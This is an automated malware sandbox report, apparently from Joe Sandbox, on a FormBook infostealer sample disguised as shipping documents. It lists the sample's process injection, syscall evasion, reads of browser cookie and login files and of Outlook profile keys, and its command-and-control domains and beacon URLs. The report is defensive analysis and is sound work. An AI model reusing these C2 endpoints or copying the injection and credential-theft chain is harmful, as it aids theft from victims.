                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeNtTerminateProcess: Direct from: 0x77382D5CJump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeNtClose: Direct from: 0x77382B6C
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeNtProtectVirtualMemory: Direct from: 0x77377B2EJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\Shipping documents..exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\ktmutil.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: NULL target: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: NULL target: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\ktmutil.exeThread register set: target process: 4836Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\ktmutil.exeThread APC queued: target process: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\Shipping documents..exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2C2E008Jump to behavior
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
                Source: C:\Users\user\Desktop\Shipping documents..exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Shipping documents..exe"Jump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeProcess created: C:\Windows\SysWOW64\srdelayed.exe "C:\Windows\SysWOW64\srdelayed.exe"Jump to behavior
                Source: C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exeProcess created: C:\Windows\SysWOW64\ktmutil.exe "C:\Windows\SysWOW64\ktmutil.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
                Source: FuFneNIzDsF.exe, 00000004.00000000.2354511544.00000000013E0000.00000002.00000001.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000004.00000002.4567827799.00000000013E1000.00000002.00000001.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000000.2507373596.0000000001891000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
                Source: Shipping documents..exe, FuFneNIzDsF.exe, 00000004.00000000.2354511544.00000000013E0000.00000002.00000001.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000004.00000002.4567827799.00000000013E1000.00000002.00000001.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000000.2507373596.0000000001891000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: FuFneNIzDsF.exe, 00000004.00000000.2354511544.00000000013E0000.00000002.00000001.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000004.00000002.4567827799.00000000013E1000.00000002.00000001.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000000.2507373596.0000000001891000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: FuFneNIzDsF.exe, 00000004.00000000.2354511544.00000000013E0000.00000002.00000001.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000004.00000002.4567827799.00000000013E1000.00000002.00000001.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000000.2507373596.0000000001891000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: Shipping documents..exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.4571453200.0000000005690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4568813272.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2433270626.0000000003560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4568990359.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2432620170.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4568829458.00000000051E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4559476128.0000000002980000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2437565309.0000000006600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\ktmutil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: Shipping documents..exeBinary or memory string: WIN_XP
                Source: Shipping documents..exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
                Source: Shipping documents..exeBinary or memory string: WIN_XPe
                Source: Shipping documents..exeBinary or memory string: WIN_VISTA
                Source: Shipping documents..exeBinary or memory string: WIN_7
                Source: Shipping documents..exeBinary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.4571453200.0000000005690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4568813272.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2433270626.0000000003560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4568990359.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2432620170.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4568829458.00000000051E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4559476128.0000000002980000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2437565309.0000000006600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		2
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		5
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter                		2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		5
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		3
                Obfuscated Files or Information                		NTDS16
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		5
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets141
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials2
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem11
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1549915 Sample: Shipping documents..exe Startdate: 06/11/2024 Architecture: WINDOWS Score: 100 30 www.schedulemassage.xyz 2->30 32 www.huiguang.xyz 2->32 34 19 other IPs or domains 2->34 44 Suricata IDS alerts for network traffic 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 Yara detected FormBook 2->48 52 4 other signatures 2->52 10 Shipping documents..exe 1 2->10         started        signatures3 50 Performs DNS queries to domains with low reputation 32->50 process4 signatures5 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 FuFneNIzDsF.exe 13->16 injected process8 signatures9 42 Found direct / indirect Syscall (likely to bypass EDR) 16->42 19 ktmutil.exe 13 16->19         started        22 srdelayed.exe 16->22         started        process10 signatures11 54 Tries to steal Mail credentials (via file / registry access) 19->54 56 Tries to harvest and steal browser information (history, passwords, etc) 19->56 58 Modifies the context of a thread in another process (thread injection) 19->58 60 3 other signatures 19->60 24 FuFneNIzDsF.exe 19->24 injected 28 firefox.exe 19->28         started        process12 dnsIp13 36 www.futurevision.life 203.161.49.193, 49987, 49988, 49989 VNPT-AS-VNVNPTCorpVN Malaysia 24->36 38 www.klohk.tech 103.224.182.242, 50005, 50006, 50007 TRELLIAN-AS-APTrellianPtyLimitedAU Australia 24->38 40 10 other IPs or domains 24->40 62 Found direct / indirect Syscall (likely to bypass EDR) 24->62 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Shipping documents..exe42%ReversingLabsWin32.Trojan.Generic
                Shipping documents..exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://nfqb.info0%Avira URL Cloudsafe
                https://dmqb.info0%Avira URL Cloudsafe
                http://www.migorengya8.click/y3dc/?DDp=ihLGZn7rk3oJmiI0qHBJyF4us9aj83dk38RHqm5p8i+Dx9088FhrC90fflTIanmBNHjorQ8RX0lkasPQ9tREfAnxyZwa91URYeYbxhv5bPljMHSbrvZtVpRz6w5PNfkG2YKS2Ps=&SvrLY=3P8lALA0%Avira URL Cloudsafe
                https://wmqqb.com0%Avira URL Cloudsafe
                https://anqb.top0%Avira URL Cloudsafe
                https://dhqb.info0%Avira URL Cloudsafe
                http://www.klohk.tech/3m3e/?SvrLY=3P8lALA&DDp=AG8wkc12D4O4qfE3dc2ZpUKPRZyp2gRu+0k6EtFb5UlufQ+lVXFR/9gePpQjCGKa/ZsQJ4MYKcJmAxrfjl4cD9BPWmhuph4utiW3Dhv00Os4z+1dRn6W+dMqbZ0s1lU/AMvHhe0=0%Avira URL Cloudsafe
                http://www.econsultoria.online/azb9/0%Avira URL Cloudsafe
                https://wqxs.info0%Avira URL Cloudsafe
                https://www.piensasolutions.com/ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=correo0%Avira URL Cloudsafe
                https://egqb.top0%Avira URL Cloudsafe
                http://www.d63dm.top/rqnz/0%Avira URL Cloudsafe
                http://www.030002128.xyz/knx2/?DDp=cx1F/qf6XWf+sqaNqgWjpjf2u/FJ3U1rCAFJJdWfl5OjgpHNlJW/Jou+UuCSZllgDcZAwgAs0R21dhdWF/X3usItMGO4lmDkyY4fIJ/HYM1kf3catma7zBplk9C6FFtSionVViQ=&SvrLY=3P8lALA0%Avira URL Cloudsafe
